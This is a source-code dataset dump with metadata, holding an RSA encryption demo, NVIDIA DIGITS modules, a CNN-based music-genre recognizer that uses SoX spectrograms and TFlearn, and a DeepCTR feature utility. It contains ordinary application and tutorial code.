"text": "#import packages\nimport os\n\ntry:\n from Crypto.PublicKey import RSA\nexcept:\n print('pycryptodome not found')\n os.system('pip install pycryptodome')\n #clear\n os.system('reset')\n from Crypto.PublicKey import RSA\n\nfrom Crypto.Cipher import PKCS1_OAEP\nimport binascii\n\n\n#key generation\n\n\nkeyPair = RSA.generate(3072)\n\n\npubKey = keyPair.publickey()\nprint(f\"Public key: (n={hex(pubKey.n)}, e={hex(pubKey.e)})\")\npubKeyPEM = pubKey.exportKey()\nprint(pubKeyPEM.decode('ascii'))\n\nprint(f\"Private key: (n={hex(pubKey.n)}, d={hex(keyPair.d)})\")\nprivKeyPEM = keyPair.exportKey()\nprint(privKeyPEM.decode('ascii'))\n\n\n\n\n#encryption\nmsg = b'A message for encryption'\nencryptor = PKCS1_OAEP.new(pubKey)\nencrypted = encryptor.encrypt(msg)\nprint(\"Encrypted:\", binascii.hexlify(encrypted))\n\n\n\n#decrpytion\ndecryptor = PKCS1_OAEP.new(keyPair)\ndecrypted = decryptor.decrypt(encrypted)\nprint('Decrypted:', decrypted)\n\n\n#source world wide web cryptobook.nakov.com\n"
}
] | 3 |
gheinrich/DIGITS | https://github.com/gheinrich/DIGITS | e43f76a00bd799add3210276b570cf0bf0ef2cf8 | 8d01ebe404be6ac43fb66380d30d28277f90865c | 469becb61c7c3cc42ed6eb67d1b549d2358455f3 | refs/heads/master | 2021-01-09T06:41:57.457234 | 2016-10-14T22:37:46 | 2016-10-14T22:37:46 | 39,290,770 | 10 | 5 | null | 2015-07-18T07:39:43 | 2016-06-15T21:27:20 | 2016-12-03T08:32:42 | Python | [
{
"alpha_fraction": 0.782608687877655,
"alphanum_fraction": 0.8115941882133484,
"avg_line_length": 38.42856979370117,
"blob_id": "b91dc248ea86a8c1284a8907470aeaabc29060cb",
"content_id": "8522436db5bdfd075deeb55a1c0b809c86b9bacb",
"detected_licenses": [
"LicenseRef-scancode-generic-cla"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 276,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 7,
"path": "/digits/dataset/tasks/__init__.py",
"repo_name": "gheinrich/DIGITS",
"src_encoding": "UTF-8",
"text": "# Copyright (c) 2014-2016, NVIDIA CORPORATION. All rights reserved.\nfrom __future__ import absolute_import\n\nfrom .analyze_db import AnalyzeDbTask\nfrom .create_db import CreateDbTask\nfrom .create_generic_db import CreateGenericDbTask\nfrom .parse_folder import ParseFolderTask\n"
},
{
"alpha_fraction": 0.5199999809265137,
"alphanum_fraction": 0.5396319031715393,
"avg_line_length": 37.79999923706055,
"blob_id": "d86a1fc37acbd6813101836b1a6b52ef836a1d11",
"content_id": "d960b00fdaccaded5e5988d8967036aac0cadc8f",
"detected_licenses": [
"LicenseRef-scancode-generic-cla"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4075,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 105,
"path": "/digits/model/images/forms.py",
"repo_name": "gheinrich/DIGITS",
"src_encoding": "UTF-8",
"text": "# Copyright (c) 2014-2016, NVIDIA CORPORATION. All rights reserved.\nfrom __future__ import absolute_import\n\nimport wtforms\nfrom wtforms import validators\n\nfrom ..forms import ModelForm\nfrom digits import utils\n\nclass ImageModelForm(ModelForm):\n \"\"\"\n Defines the form used to create a new ImageModelJob\n \"\"\"\n\n crop_size = utils.forms.IntegerField('Crop Size',\n validators = [\n validators.NumberRange(min=1),\n validators.Optional()\n ],\n tooltip = \"If specified, during training a random square crop will be taken from the input image before using as input for the network.\"\n )\n\n use_mean = utils.forms.SelectField('Subtract Mean',\n choices = [\n ('none', 'None'),\n ('image', 'Image'),\n ('pixel', 'Pixel'),\n ],\n default='image',\n tooltip = \"Subtract the mean file or mean pixel for this dataset from each image.\"\n )\n\n aug_flip = utils.forms.SelectField('Flipping',\n choices = [\n ('none', 'None'),\n ('fliplr', 'Horizontal'),\n ('flipud', 'Vertical'),\n ('fliplrud', 'Horizontal and/or Vertical'),\n ],\n default='none',\n tooltip = \"Randomly flips each image during batch preprocessing.\"\n )\n\n aug_quad_rot = utils.forms.SelectField('Quadrilateral Rotation',\n choices = [\n ('none', 'None'),\n ('rot90', '0, 90 or 270 degrees'),\n ('rot180', '0 or 180 degrees'),\n ('rotall', '0, 90, 180 or 270 degrees.'),\n ],\n default='none',\n tooltip = \"Randomly rotates (90 degree steps) each image during batch preprocessing.\"\n )\n\n aug_rot = utils.forms.IntegerField('Rotation (+- deg)',\n default=0,\n validators=[ \n validators.NumberRange(min=0, max=180)\n ],\n tooltip = \"The uniform-random rotation angle that will be performed during batch preprocessing.\"\n )\n\n aug_scale = utils.forms.FloatField('Rescale (stddev)',\n default=0,\n validators=[ \n validators.NumberRange(min=0, max=1)\n ],\n tooltip = \"Retaining image size, the image is rescaled with a +-stddev of this parameter. Suggested value is 0.07.\"\n )\n\n aug_noise = utils.forms.FloatField('Noise (stddev)',\n default=0,\n validators=[ \n validators.NumberRange(min=0, max=1)\n ],\n tooltip = \"Adds AWGN (Additive White Gaussian Noise) during batch preprocessing, assuming [0 1] pixel-value range. Suggested value is 0.03.\"\n )\n\n aug_hsv_use = utils.forms.BooleanField('HSV Shifting',\n default = False,\n tooltip = \"Augmentation by normal-distributed random shifts in HSV color space, assuming [0 1] pixel-value range.\",\n validators=[ \n ]\n )\n aug_hsv_h = utils.forms.FloatField('Hue',\n default=0.02,\n validators=[ \n validators.NumberRange(min=0, max=0.5)\n ],\n tooltip = \"Standard deviation of a shift that will be performed during preprocessing, assuming [0 1] pixel-value range.\"\n )\n aug_hsv_s = utils.forms.FloatField('Saturation',\n default=0.04,\n validators=[ \n validators.NumberRange(min=0, max=0.5)\n ],\n tooltip = \"Standard deviation of a shift that will be performed during preprocessing, assuming [0 1] pixel-value range.\"\n )\n aug_hsv_v = utils.forms.FloatField('Value',\n default=0.06,\n validators=[ \n validators.NumberRange(min=0, max=0.5)\n ],\n tooltip = \"Standard deviation of a shift that will be performed during preprocessing, assuming [0 1] pixel-value range.\"\n )\n\n"
},
{
"alpha_fraction": 0.7153024673461914,
"alphanum_fraction": 0.7437722682952881,
"avg_line_length": 24.454545974731445,
"blob_id": "a3a9678e5103becb78ef4830527db39e8cfdbd46",
"content_id": "427ae6f587a96a76677771113d955004d2a99055",
"detected_licenses": [
"LicenseRef-scancode-generic-cla"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 281,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 11,
"path": "/digits/model/tasks/test_caffe_train.py",
"repo_name": "gheinrich/DIGITS",
"src_encoding": "UTF-8",
"text": "# Copyright (c) 2014-2016, NVIDIA CORPORATION. All rights reserved.\nfrom __future__ import absolute_import\n\nfrom . import caffe_train\nfrom digits import test_utils\n\ndef test_caffe_imports():\n test_utils.skipIfNotFramework('caffe')\n\n import numpy\n import google.protobuf\n\n"
},
{
"alpha_fraction": 0.7614678740501404,
"alphanum_fraction": 0.7981651425361633,
"avg_line_length": 35.33333206176758,
"blob_id": "5c2109417bd6c18c3e45dbf6f116956877dea3ef",
"content_id": "dde9e57fc8324361c15f65f10ef77e67432c48d8",
"detected_licenses": [
"LicenseRef-scancode-generic-cla"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 218,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 6,
"path": "/digits/model/tasks/__init__.py",
"repo_name": "gheinrich/DIGITS",
"src_encoding": "UTF-8",
"text": "# Copyright (c) 2014-2016, NVIDIA CORPORATION. All rights reserved.\nfrom __future__ import absolute_import\n\nfrom .caffe_train import CaffeTrainTask\nfrom .torch_train import TorchTrainTask\nfrom .train import TrainTask\n"
},
{
"alpha_fraction": 0.8073770403862,
"alphanum_fraction": 0.8237704634666443,
"avg_line_length": 47.79999923706055,
"blob_id": "3f44dbb037bdbba9fb0aff9daba8f6a2de066fe7",
"content_id": "0368c432cb8f213d10340e66d490101dfcc138c5",
"detected_licenses": [
"LicenseRef-scancode-generic-cla"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 244,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 5,
"path": "/digits/pretrained_model/tasks/__init__.py",
"repo_name": "gheinrich/DIGITS",
"src_encoding": "UTF-8",
"text": "# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved.\nfrom __future__ import absolute_import\nfrom .upload_pretrained import UploadPretrainedModelTask\nfrom .caffe_upload import CaffeUploadTask\nfrom .torch_upload import TorchUploadTask\n"
},
{
"alpha_fraction": 0.625,
"alphanum_fraction": 0.638671875,
"avg_line_length": 21.217391967773438,
"blob_id": "420a002c2a8e08d2a0c6230dd0b853f775803fab",
"content_id": "16d7affbd46e28c1feb150cefa9a4539b45a4745",
"detected_licenses": [
"LicenseRef-scancode-generic-cla"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 512,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 23,
"path": "/scripts/travis/test.sh",
"repo_name": "gheinrich/DIGITS",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved.\nset -e\n\nLOCAL_DIR=$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\nROOT_DIR=$( dirname \"$(dirname \"$LOCAL_DIR\")\")\n\nif [ ! -z \"$DEB_BUILD\" ]; then\n echo \"Skipping for deb build\"\n exit 0\nfi\n\nset -x\n\nexport CAFFE_ROOT=~/caffe\nif [ -z \"$DIGITS_TEST_FRAMEWORK\" ] || [ \"$DIGITS_TEST_FRAMEWORK\" = \"torch\" ]; then\n export TORCH_ROOT=~/torch\nfi\n# Disable OpenMP multi-threading\nexport OMP_NUM_THREADS=1\n\ncd $ROOT_DIR\n./digits-test -v\n\n"
},
{
"alpha_fraction": 0.7553957104682922,
"alphanum_fraction": 0.7841726541519165,
"avg_line_length": 45.33333206176758,
"blob_id": "f10947c526b96fa793b5f416cc434dabd5f56751",
"content_id": "20e5aae59754aa50017128bfb313207751cdb545",
"detected_licenses": [
"LicenseRef-scancode-generic-cla"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 139,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 3,
"path": "/digits/pretrained_model/__init__.py",
"repo_name": "gheinrich/DIGITS",
"src_encoding": "UTF-8",
"text": "# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved.\nfrom __future__ import absolute_import\nfrom .job import PretrainedModelJob\n"
},
{
"alpha_fraction": 0.7382352948188782,
"alphanum_fraction": 0.7617647051811218,
"avg_line_length": 25.076923370361328,
"blob_id": "d576fabcaf22d0b841aff835bd8464dbad1dd90d",
"content_id": "873c6f849537877445b0751ba5b8d8d7056e878f",
"detected_licenses": [
"LicenseRef-scancode-generic-cla"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 340,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 13,
"path": "/digits/model/images/classification/forms.py",
"repo_name": "gheinrich/DIGITS",
"src_encoding": "UTF-8",
"text": "# Copyright (c) 2014-2016, NVIDIA CORPORATION. All rights reserved.\nfrom __future__ import absolute_import\n\nimport wtforms\nfrom wtforms import validators\n\nfrom ..forms import ImageModelForm\n\nclass ImageClassificationModelForm(ImageModelForm):\n \"\"\"\n Defines the form used to create a new ImageClassificationModelJob\n \"\"\"\n pass\n\n"
},
{
"alpha_fraction": 0.7178988456726074,
"alphanum_fraction": 0.7334630489349365,
"avg_line_length": 26,
"blob_id": "8266a75f9149257835457742462bc47cb6260fcb",
"content_id": "59052f6568c7a00b006d492124d73fe77c15996a",
"detected_licenses": [
"LicenseRef-scancode-generic-cla"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 514,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 19,
"path": "/digits/config/__init__.py",
"repo_name": "gheinrich/DIGITS",
"src_encoding": "UTF-8",
"text": "# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved.\nfrom __future__ import absolute_import\n\n# Create this object before importing the following imports, since they edit the list\noption_list = {}\n\nfrom . import caffe\nfrom . import gpu_list\nfrom . import jobs_dir\nfrom . import log_file\nfrom . import torch\nfrom . import server_name\nfrom . import store_option\n\ndef config_value(option):\n \"\"\"\n Return the current configuration value for the given option\n \"\"\"\n return option_list[option]\n\n"
},
{
"alpha_fraction": 0.5044929385185242,
"alphanum_fraction": 0.5089858770370483,
"avg_line_length": 44.82352828979492,
"blob_id": "18acace4275e28f1246372af0c11807238c4e51a",
"content_id": "9c2f40d28420b68545f1d8e0b96ad722bd90b157",
"detected_licenses": [
"LicenseRef-scancode-generic-cla"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1558,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 34,
"path": "/digits/extensions/view/imageSegmentation/static/js/app.js",
"repo_name": "gheinrich/DIGITS",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved.\n\n// Angularjs app, visualization_app\nvar app = angular.module('visualization_app', ['ngStorage']);\n\n// Controller to handle global display attributes\napp.controller('display_controller',\n ['$scope', '$rootScope', '$localStorage',\n function($scope, $rootScope, $localStorage) {\n $rootScope.storage = $localStorage.$default({\n opacity: .3,\n mask: 0.0,\n });\n $scope.fill_style = {'opacity': $localStorage.opacity};\n $scope.mask_style = {'opacity': $localStorage.mask};\n // Broadcast to child scopes that the opacity has changed.\n $scope.$watch(function() {\n return $localStorage.opacity;\n }, function() {\n $scope.fill_style = {'opacity': $localStorage.opacity};\n });\n // Broadcast to child scopes that the mask has changed.\n $scope.$watch(function() {\n return $localStorage.mask;\n }, function() {\n $scope.mask_style = {'opacity': $localStorage.mask};\n });\n }]);\n\n// Because jinja uses {{ and }}, tell angular to use {[ and ]}\napp.config(['$interpolateProvider', function($interpolateProvider) {\n $interpolateProvider.startSymbol('{[');\n $interpolateProvider.endSymbol(']}');\n}]);\n"
},
{
"alpha_fraction": 0.7269938588142395,
"alphanum_fraction": 0.7515337467193604,
"avg_line_length": 24,
"blob_id": "bfeb66481f87c24c8f3f65a08f7538290b11e351",
"content_id": "e04c813dcb68919ba9890ffa49b1fce38b626963",
"detected_licenses": [
"LicenseRef-scancode-generic-cla"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 326,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 13,
"path": "/digits/model/images/generic/forms.py",
"repo_name": "gheinrich/DIGITS",
"src_encoding": "UTF-8",
"text": "# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved.\nfrom __future__ import absolute_import\n\nimport wtforms\nfrom wtforms import validators\n\nfrom ..forms import ImageModelForm\n\nclass GenericImageModelForm(ImageModelForm):\n \"\"\"\n Defines the form used to create a new GenericImageModelJob\n \"\"\"\n pass\n\n"
}
] | 11 |
shym98/Recognizer | https://github.com/shym98/Recognizer | 0ee5b69fbfcd55b41d51da3a24772b6a91db87bd | 8e5b2f18260a4aea871917ec6da294ebe4ed83fc | 2a12b8a1fa1b4eeef49d073d879e928ca2eb57db | refs/heads/master | 2020-03-22T17:44:01.789626 | 2018-07-10T10:24:08 | 2018-07-10T10:24:08 | 140,412,185 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7402299046516418,
"alphanum_fraction": 0.751724123954773,
"avg_line_length": 32.53845977783203,
"blob_id": "37fe9da4a7d08e73351b05a81e2348308ef02e09",
"content_id": "5a30214eba0715cf589faffade9576e1682229f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 435,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 13,
"path": "/imageTools.py",
"repo_name": "shym98/Recognizer",
"src_encoding": "UTF-8",
"text": "from PIL import Image\nimport numpy as np\n\ndef getProcessedData(image, imageSize):\n image = image.resize((imageSize, imageSize), resample=Image.ANTIALIAS)\n imageData = np.asarray(image, dtype=np.uint8).reshape(imageSize, imageSize, 1)\n imageData = imageData/255.\n return imageData\n\ndef getImageData(filename,imageSize):\n image = Image.open(filename)\n imageData = getProcessedData(image, imageSize)\n return imageData"
},
{
"alpha_fraction": 0.7444168925285339,
"alphanum_fraction": 0.789081871509552,
"avg_line_length": 20.263158798217773,
"blob_id": "b2362c5c943e96aad7be70fe6164729951221c60",
"content_id": "1f4ef2ee7eff3a09a30a270ccba16cbd753ffdef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 403,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 19,
"path": "/config.py",
"repo_name": "shym98/Recognizer",
"src_encoding": "UTF-8",
"text": "# Paths\npath = '/home/maxim/PycharmProjects/Recognizer/Songs/'\nspectPath = '/home/maxim/PycharmProjects/Recognizer/Spect/'\nslicePath = '/home/maxim/PycharmProjects/Recognizer/Spect/Slices/'\n\n#Model parameters\nbatchSize = 128\nnumberOfEpoch = 20\n\n#Slice parameters\nsliceSize = 128\n\n#Dataset parameters\nfilesPerGenre = 4000\nvalidationRatio = 0.3\ntestRatio = 0.1\n\n#Spectrogram resolution\npixelPerSecond = 50"
},
{
"alpha_fraction": 0.6330578327178955,
"alphanum_fraction": 0.6421487331390381,
"avg_line_length": 35.681819915771484,
"blob_id": "2201b75d76b0b0d80fa9039a07d48d2142c353aa",
"content_id": "1bcf2c01072daf3463f34774588c86072952863b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2420,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 66,
"path": "/songConverting.py",
"repo_name": "shym98/Recognizer",
"src_encoding": "UTF-8",
"text": "from subprocess import Popen, PIPE, STDOUT\nimport os\nfrom PIL import Image\nfrom config import *\n\ncurrentPath = os.path.dirname(os.path.realpath(__file__))\n\ndef createSpectrogram(filename, newFilename):\n command = \"sox '{}' '/tmp/{}.mp3' remix 1,2\".format(path + filename + '.mp3', newFilename)\n p = Popen(command, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True, cwd=currentPath)\n output, errors = p.communicate()\n command = \"sox '/tmp/{}.mp3' -n spectrogram -Y 200 -X {} -m -r -o '{}.png'\".format(newFilename, 50, spectPath + newFilename)\n p = Popen(command, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True, cwd=currentPath)\n output, errors = p.communicate()\n os.remove(\"/tmp/{}.mp3\".format(newFilename))\n\ndef createSlicesFromSpectrograms(desiredSize):\n for filename in os.listdir(spectPath):\n if filename.endswith(\".png\"):\n sliceSpectrogram(filename, desiredSize)\n\ndef sliceSpectrogram(filename, desiredSize):\n genre = filename.split(\"_\")[0]\n img = Image.open(spectPath + filename)\n\n width, height = img.size\n nbSamples = int(width / desiredSize)\n width - desiredSize\n\n myslicePath = slicePath + \"{}/\".format(genre)\n if not os.path.exists(os.path.dirname(myslicePath)):\n try:\n os.makedirs(os.path.dirname(myslicePath))\n except OSError as exc:\n print('error')\n\n for i in range(nbSamples):\n startPixel = i * desiredSize\n img.crop((startPixel, 1, startPixel + desiredSize, desiredSize + 1)).save(\n slicePath + \"{}/{}_{}.png\".format(genre, filename[:-4], i))\n\n try:\n os.remove(spectPath + filename)\n except OSError as exc:\n print('No such file')\n\ndef songsToData():\n\n files = os.listdir(path)\n files = [file for file in files if file.endswith(\".mp3\")]\n nbFiles = len(files)\n\n if not os.path.exists(os.path.dirname(spectPath)):\n try:\n os.makedirs(os.path.dirname(spectPath))\n except OSError as exc:\n print(\"error\")\n\n for index, filename in enumerate(files):\n print(\"Creating spectrogram for file {}/{}...\".format(index + 1, nbFiles))\n genre = filename.split(\"_\")[0]\n index1 = filename.split(\"_\")[1].split(\".\")[0]\n newFilename = genre + \"_\" + str(index1)\n createSpectrogram(newFilename, newFilename + \"mono\")\n\n createSlicesFromSpectrograms(sliceSize)"
},
{
"alpha_fraction": 0.6657825112342834,
"alphanum_fraction": 0.692307710647583,
"avg_line_length": 15.391304016113281,
"blob_id": "01222ecc8ca57cb48f35eccbe1ea9e0d16aa5ff4",
"content_id": "b9d204dbf2ad6414906e50fdd504e6d19ee645a7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 377,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 23,
"path": "/README.md",
"repo_name": "shym98/Recognizer",
"src_encoding": "UTF-8",
"text": "# Recognizer\nMusic genres recognition using convolutional neural network\n\nUsed:\n- TFlearn\n- PIL\n- SoX\n- TKinter\n\nProgram's modes:\n- \"slice\" (create slices from songs)\n- \"train\" (create or load datasets and training model)\n- \"test\" (testing model)\n- main mode (run UI)\n\nCurrent genres:\n- *dubstep*\n- *classical*\n- *jazz*\n- *heavy-metal*\n\nAccuracy: **87.72%** \nLoss: **0.65278**\n"
},
{
"alpha_fraction": 0.6917904019355774,
"alphanum_fraction": 0.7010366916656494,
"avg_line_length": 30.584070205688477,
"blob_id": "5fcc29d2a62a8bf08fc7376e73add31df299dcda",
"content_id": "e3e5878af983f52741557e3c24ba39e7da596cc8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3571,
"license_type": "no_license",
"max_line_length": 184,
"num_lines": 113,
"path": "/main.py",
"repo_name": "shym98/Recognizer",
"src_encoding": "UTF-8",
"text": "import string\nimport argparse\nimport random\n\nfrom songConverting import *\nfrom networkModel import *\nfrom dataset import *\nfrom tkinter.filedialog import *\nfrom tkinter import messagebox\nfrom shutil import copyfile, rmtree\n\ndef toFixed(numObj, digits=0):\n return f\"{numObj:.{digits}f}\"\n\n#List genres\ngenres = os.listdir(slicePath)\ngenres = [filename for filename in genres if os.path.isdir(slicePath+filename)]\nnbClasses = len(genres)\n\n#Create model\nmodel = createModel(nbClasses, sliceSize)\n\n# Choosing file to recognize\ndef chooseFile():\n\tmodel.load('musicDNN.tflearn')\n\tfilename = askopenfilename()\n\tif filename.endswith(\".mp3\"):\n\t\tfileLabel.config(text=filename)\n\telse:\n\t\tmessagebox.showinfo(\"Error\", \"Incorrect file extension. Must be *.mp3\")\n\t\treturn\n\n# Recognizing song\ndef recognize():\n\tfilePath = fileLabel['text']\n\tcopyfile(filePath, path + \"test.mp3\")\n\tcreateSpectrogram(\"test\", \"test_mono\")\n\tsliceSpectrogram(\"test_mono.png\", sliceSize)\n\tdata = []\n\tfor filename in os.listdir(slicePath + \"test/\"):\n\t\tif filename.endswith(\".png\"):\n\t\t\tdata.append(getImageData(slicePath + \"test/\" + filename, sliceSize))\n\tpredictionSoftmax = model.predict(data)[0]\n\tprint(toFixed(predictionSoftmax[0],3),toFixed(predictionSoftmax[1],3), toFixed(predictionSoftmax[2],3), toFixed(predictionSoftmax[3],3))\n\tpredictedIndex = max(enumerate(predictionSoftmax), key=lambda x: x[1])[0]\n\ttext = genres[predictedIndex]\n\tmessagebox.showinfo(\"Result\", text)\n\trmtree(slicePath + \"test/\")\n\ttry:\n\t\tos.remove(path + \"test.mp3\")\n\texcept OSError as exc:\n\t\tprint('No such file')\n\n# Open main form\nif len(sys.argv) == 1:\n\n\troot = Tk()\n\troot.title(\"Recognizer\")\n\n\tnameLabel = Label(root, text = \"File path: \")\n\tnameLabel.grid(row = 1, column = 1)\n\tfileLabel = Label(root, text = \" \", bg = \"white\", justify = \"center\")\n\tfileLabel.grid(row = 1, column = 2)\n\tchoseButton = Button(root, text = \"Browse\", bg = \"white\", command = chooseFile).grid(row = 1, column = 3)\n\trecognizeButton = Button(root, text = \"Recognize\", bg = \"white\", command = recognize).grid(row = 2, column = 1, columnspan = 3)\n\n\troot.mainloop()\n\n\texit(0)\n\n# Parsing arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"mode\", nargs='+', choices=[\"train\",\"test\",\"slice\"])\nargs = parser.parse_args()\n\n# Converting songs into spectrogram and slicing them\nif \"slice\" in args.mode:\n\tsongsToData()\n\tsys.exit()\n\n# Train model\nif \"train\" in args.mode:\n\n\t#Create or load new dataset\n\ttrain_X, train_y, validation_X, validation_y = getDataset(filesPerGenre, genres, sliceSize, validationRatio, testRatio, mode=\"train\")\n\n\t#Define run id for graphs\n\trun_id = \"MusicGenres - \"+str(batchSize)+\" \"+''.join(random.SystemRandom().choice(string.ascii_uppercase) for _ in range(10))\n\n\t#Train the model\n\tprint(\"[+] Training the model...\")\n\tmodel.fit(train_X, train_y, n_epoch=numberOfEpoch, batch_size=batchSize, shuffle=True, validation_set=(validation_X, validation_y), snapshot_step=100, show_metric=True, run_id=run_id)\n\tprint(\" Model trained!\")\n\n\t#Save trained model\n\tprint(\"[+] Saving the weights...\")\n\tmodel.save('musicDNN.tflearn')\n\tprint(\"[+] Weights saved!\")\n\n# Test model\nif \"test\" in args.mode:\n\n\t#Create or load new dataset\n\ttest_X, test_y = getDataset(filesPerGenre, genres, sliceSize, validationRatio, testRatio, mode=\"test\")\n\n\t#Load weights\n\tprint(\"[+] Loading weights...\")\n\tmodel.load('musicDNN.tflearn')\n\tprint(\" Weights loaded! ✅\")\n\n\ttestAccuracy = model.evaluate(test_X, test_y)[0]\n\tprint(\"[+] Test accuracy: {} \".format(testAccuracy))\n\t#rename()\n"
},
{
"alpha_fraction": 0.654445469379425,
"alphanum_fraction": 0.6874427199363708,
"avg_line_length": 35.400001525878906,
"blob_id": "49c940d1bc90cbfe1ae0b94772d3df621a08a293",
"content_id": "0f8bd1b67c3cfe08e4c3d3355b49ab5d72d38f76",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1091,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 30,
"path": "/networkModel.py",
"repo_name": "shym98/Recognizer",
"src_encoding": "UTF-8",
"text": "import tflearn\nfrom tflearn import input_data, conv_2d, max_pool_2d, fully_connected, dropout, regression\n\ndef createModel(classesNumber, imageSize):\n\n print(\"[+] Creating model ...\")\n network = input_data(shape=[None, imageSize, imageSize, 1], name='input')\n\n network = conv_2d(network, 64, 2, activation='elu', weights_init=\"Xavier\")\n network = max_pool_2d(network, 2)\n\n network = conv_2d(network, 128, 2, activation='elu', weights_init=\"Xavier\")\n network = max_pool_2d(network, 2)\n\n network = conv_2d(network, 256, 2, activation='elu', weights_init=\"Xavier\")\n network = max_pool_2d(network, 2)\n\n network = conv_2d(network, 512, 2, activation='elu', weights_init=\"Xavier\")\n network = max_pool_2d(network, 2)\n\n network = fully_connected(network, 1024, activation='elu')\n network = dropout(network, 0.5)\n\n network = fully_connected(network, classesNumber, activation='softmax')\n network = regression(network, optimizer='rmsprop', loss='categorical_crossentropy')\n\n network = tflearn.DNN(network)\n print(\"[+] Model created\")\n\n return network"
}
] | 6 |
welloderx/wechat-2021-BigDataChallenge | https://github.com/welloderx/wechat-2021-BigDataChallenge | 7fc7ccc12e308d2fbdf73f2ea8490f3fad018f92 | d86ad0f7f7972bc246ca20771fa2fc2a5c34340d | ebf436ba709c9f254544548b7312bf72f5f3f64d | refs/heads/master | 2023-05-11T20:22:03.909505 | 2021-06-07T05:20:08 | 2021-06-07T05:20:08 | 373,364,923 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6170493960380554,
"alphanum_fraction": 0.6231620907783508,
"avg_line_length": 37.31012725830078,
"blob_id": "6462d89e7dd4cf7d166fc15845890da3e1111690",
"content_id": "ab9de7dc49f699c624b2025d24269f3d7ee2e21d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6053,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 158,
"path": "/src/deepctr_ext/utils.py",
"repo_name": "welloderx/wechat-2021-BigDataChallenge",
"src_encoding": "UTF-8",
"text": "from collections import OrderedDict\nfrom .feat import SparseFeat, DenseFeat, VarLenSparseFeat\nimport torch.nn as nn\nimport numpy as np\nimport torch\nfrom .layers import SequencePoolingLayer\n\ndef get_feature_names(feature_columns):\n features = build_input_features(feature_columns)\n return list(features.keys())\n\n\ndef build_input_features(feature_columns):\n # Return OrderedDict: {feature_name:(start, start+dimension)}\n\n features = OrderedDict()\n start = 0\n for feat in feature_columns:\n feat_name = feat.name\n if feat_name in features:\n continue\n if isinstance(feat, SparseFeat):\n features[feat_name] = (start, start + 1)\n start += 1\n elif isinstance(feat, DenseFeat):\n features[feat_name] = (start, start + feat.dimension)\n start += feat.dimension\n elif isinstance(feat, VarLenSparseFeat):\n features[feat_name] = (start, start + feat.maxlen)\n start += feat.maxlen\n if feat.length_name is not None and feat.length_name not in features:\n features[feat.length_name] = (start, start + 1)\n start += 1\n else:\n raise TypeError(\"Invalid feature column type,got\", type(feat))\n return features\n\n\ndef create_embedding_matrix(feature_columns, init_std=0.0001, linear=False, sparse=False, device='cpu'):\n # Return nn.ModuleDict: for sparse features, {embedding_name: nn.Embedding}\n # for varlen sparse features, {embedding_name: nn.EmbeddingBag}\n sparse_feature_columns = list(\n filter(lambda x: isinstance(x, SparseFeat), feature_columns)) if len(feature_columns) else []\n\n varlen_sparse_feature_columns = list(\n filter(lambda x: isinstance(x, VarLenSparseFeat), feature_columns)) if len(feature_columns) else []\n\n embedding_dict = nn.ModuleDict(\n {feat.embedding_name: nn.Embedding(feat.vocabulary_size, feat.embedding_dim if not linear else 1, sparse=sparse)\n for feat in\n sparse_feature_columns + varlen_sparse_feature_columns}\n )\n\n # for feat in varlen_sparse_feature_columns:\n # embedding_dict[feat.embedding_name] = nn.EmbeddingBag(\n # feat.dimension, embedding_size, sparse=sparse, mode=feat.combiner)\n\n for tensor in embedding_dict.values():\n nn.init.normal_(tensor.weight, mean=0, std=init_std)\n\n return embedding_dict.to(device)\n\n\n# 